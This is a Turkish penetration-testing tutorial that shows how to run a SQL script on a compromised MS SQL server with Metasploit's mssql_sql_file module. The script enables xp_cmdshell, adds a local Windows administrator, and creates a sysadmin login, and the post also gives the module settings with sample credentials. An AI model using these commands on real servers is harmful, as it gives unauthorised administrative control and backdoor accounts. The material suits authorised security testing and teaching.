MSF mssql_sql_file Auxiliary Modülü ile MS SQL Veritabanında Betik Dosyaları Kullanılarak SQL Sorgularının Gerçekleştirilmesi

Sızma testleri sırasında, erişim bilgileri elde edilen MS SQL veritabanı uygulamasında bir betik dosyasında yazılı olan SQL komutları ile sorgulama gerçekleştirilmesi gerekmektedir. Bu yazıda, MSF mssql_sql_file auxiliary modülü kullanılarak, MS SQL sunucunda bir dosyada kayıtlı olan SQL sorguları ile bir komut çalıştırılacaktır.

MSSQL veritabanında xp_cmdshell konfigürasyonunu etkinleştiren, işletim sistemi üzerinde yeni bir yerel yönetici ve veritabanı üzerinde “sysadmin” rolünde yeni bir veritabanı kullanıcısı oluşturan bir betik aşağıdaki gibidir.

EXECUTE sp_configure ‘show advanced options’, 1; RECONFIGURE WITH OVERRIDE;
EXECUTE sp_configure ‘xp_cmdshell’, 1; RECONFIGURE WITH OVERRIDE;

EXECUTE (‘master.sys.xp_cmdshell ”net user YerelYonetici Yy123456 /add” ‘);
EXECUTE (‘master.sys.xp_cmdshell ”net localgroup Administrators YerelYonetici /add” ‘);

Create Login UygulamaYoneticisi with password = ‘Uu123456’;
EXEC sp_addsrvrolemember @loginame = UygulamaYoneticisi, @rolename = sysadmin

performing-multiple-sql-queries-within-a-file-on-ms-sql-database-by-using-msf-mssql-sql-file-auxiliary-module-01

Kurum ağında 10.20.30.72 IP adresindeki MS SQL veritabanına ait erişim bilgileri, “Test/Tt123456” olarak elde edilmiş olsun. Bu kullanıcının hakları ile, veritabanında betik dosyasındaki SQL sorgularını çalıştırmak için MSF mssql_sql_file modülü kullanılabilir. Bu amaçla, modül seçilir ve seçenekleri incelenir.

search mssql_sql_file
use auxiliary/admin/mssql/mssql_sql_file
show options

performing-multiple-sql-queries-within-a-file-on-ms-sql-database-by-using-msf-mssql-sql-file-auxiliary-module-02

Modüle IP adresi, erişim için gerekli kimlik bilgisi verilerek modül seçenekleri ayarlanabilir.

set RHOST 10.20.30.72
set USERNAME Test
set PASSWORD Tt123456
set SQL_FILE /root/Desktop/SqlBetik.txt
show options

performing-multiple-sql-queries-within-a-file-on-ms-sql-database-by-using-msf-mssql-sql-file-auxiliary-module-03

Seçenekler ayarlandırıldıktan sonra modül çalıştırılabilir. Modül çalıştırıldığında modüle parametre olarak verilen kullanıcı hakları ile belirtilen SQL dosyasındaki komutlar çalıştırılır.

run

performing-multiple-sql-queries-within-a-file-on-ms-sql-database-by-using-msf-mssql-sql-file-auxiliary-module-04

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.